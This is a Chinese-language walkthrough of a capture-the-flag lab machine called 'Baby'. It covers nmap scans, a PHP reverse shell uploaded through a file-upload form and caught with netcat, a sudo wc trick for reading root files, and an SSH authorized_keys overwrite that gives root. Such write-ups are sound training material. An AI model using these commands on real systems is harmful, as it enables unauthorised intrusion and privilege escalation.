┌──(root㉿kali)-[~/miaosec] └─# nmap -sn 192.168.2.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-16 09:10 CST Nmap scan report for 192.168.2.1 Host is up (0.00069s latency). MAC Address: 0A:00:27:00:00:07 (Unknown) Nmap scan report for 192.168.2.2 Host is up (0.00059s latency). MAC Address: 08:00:27:59:EA:A8 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.21 Host is up (0.0013s latency). MAC Address: 08:00:27:67:2B:0B (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.4 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.19 seconds
靶机IP:192.168.2.21
2、端口扫描
1.全端口扫描
1 2 3 4 5 6 7 8 9 10 11 12
┌──(root㉿kali)-[~/miaosec] └─# nmap --min-rate 10000 -p- 192.168.2.21 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-16 09:10 CST Nmap scan report for 192.168.2.21 Host is up (0.00044s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:67:2B:0B (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 3.71 seconds
┌──(root㉿kali)-[~/miaosec] └─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.21 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-16 09:11 CST Nmap scan report for 192.168.2.21 Host is up (0.0013s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA) | 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA) |_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519) 80/tcp open http Apache httpd 2.4.62 ((Debian)) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). |_http-server-header: Apache/2.4.62 (Debian) MAC Address: 08:00:27:67:2B:0B (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.29 seconds
3.udp扫描
1 2 3 4 5 6 7 8 9 10
┌──(root㉿kali)-[~/miaosec] └─# nmap -sU --top-ports 100 192.168.2.21 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-16 09:12 CST Nmap scan report for 192.168.2.21 Host is up (0.00091s latency). All 100 scanned ports on 192.168.2.21 are in ignored states. Not shown: 54 closed udp ports (port-unreach), 46 open|filtered udp ports (no-response) MAC Address: 08:00:27:67:2B:0B (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 48.69 seconds
二、WEB渗透
访问80端口,发现是一个文件上传
尝试上传shell脚本,成功上传
三、获取www-data权限
访问rev.php,成功获取到www-data权限
1 2 3 4 5 6
┌──(root㉿kali)-[/tools] └─# nc -lvnp 4444 listening on [any] 4444 ... connect to [192.168.2.4] from (UNKNOWN) [192.168.2.21] 53386 id uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Baby:/var/www/html$ su aaa Password: aaa@Baby:/var/www/html$ id uid=1001(aaa) gid=1001(aaa) groups=1001(aaa)
查看sudo -l
1 2 3 4 5 6 7
aaa@Baby:/$ sudo -l Matching Defaults entries for aaa on Baby: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User aaa may run the following commands on Baby: (ALL) NOPASSWD: /usr/bin/wc
可以无root密码使用/usr/bin/wc
/usr/bin/wc可以读取文件
1 2
LFILE=file_to_read sudowc --files0-from "$LFILE"
2、获取ccc权限
尝试使用root密码进行登录,成功切换到ccc权限
1 2 3 4
aaa@Baby:/$ su ccc Password: ccc@Baby:/$ id uid=1003(ccc) gid=1003(ccc) groups=1003(ccc)
查看sudo -l
1 2 3 4 5 6 7
ccc@Baby:/$ sudo -l Matching Defaults entries for ccc on Baby: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User ccc may run the following commands on Baby: (ALL) NOPASSWD: /opt/ccc.sh
可以使用root权限执行/opt/ccc.sh
3、获取root权限
在aaa用户的权限下,使用/usr/bin/wc查看/opt/ccc.sh的内容
1 2
aaa@Baby:/$ sudo /usr/bin/wc --files0-from /opt/ccc.sh /usr/bin/wc: '#!/bin/bash'$'\n\n''cp /home/ccc/.ssh/id_rsa.pub /root/.ssh/authorized_keys'$'\n': No such file or directory
ccc@Baby:~$ ssh-keygen -t rsa Generating public/private rsa key pair. Enter file inwhich to save the key (/home/ccc/.ssh/id_rsa): Created directory '/home/ccc/.ssh'. Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/ccc/.ssh/id_rsa Your public key has been saved in /home/ccc/.ssh/id_rsa.pub The key fingerprint is: SHA256:PhHTjSU1RV8m3T+JHSaD8XHA67hTmVGNU8MvKSQ41xU ccc@Baby The key's randomart image is: +---[RSA 3072]----+ | ..+B*EB*| | o.o*+==O*| | oooo..Oo*| | o .+o+o| | S o.+..| | . . . = | | o o | | . o | | . | +----[SHA256]-----+
执行/opt/ccc.sh
1
ccc@Baby:~/.ssh$ sudo /opt/ccc.sh
获取到root权限
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
ccc@Baby:~/.ssh$ ssh root@127.0.0.1 -i id_rsa The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. ECDSA key fingerprint is SHA256:IV6iZTL6D//1Ojh0d8XoSMepPgjyUfV/FpQmf3q35Hg. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts. Linux Baby 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Oct 12 03:42:24 2025 from 192.168.3.94 root@Baby:~# id uid=0(root) gid=0(root) groups=0(root)
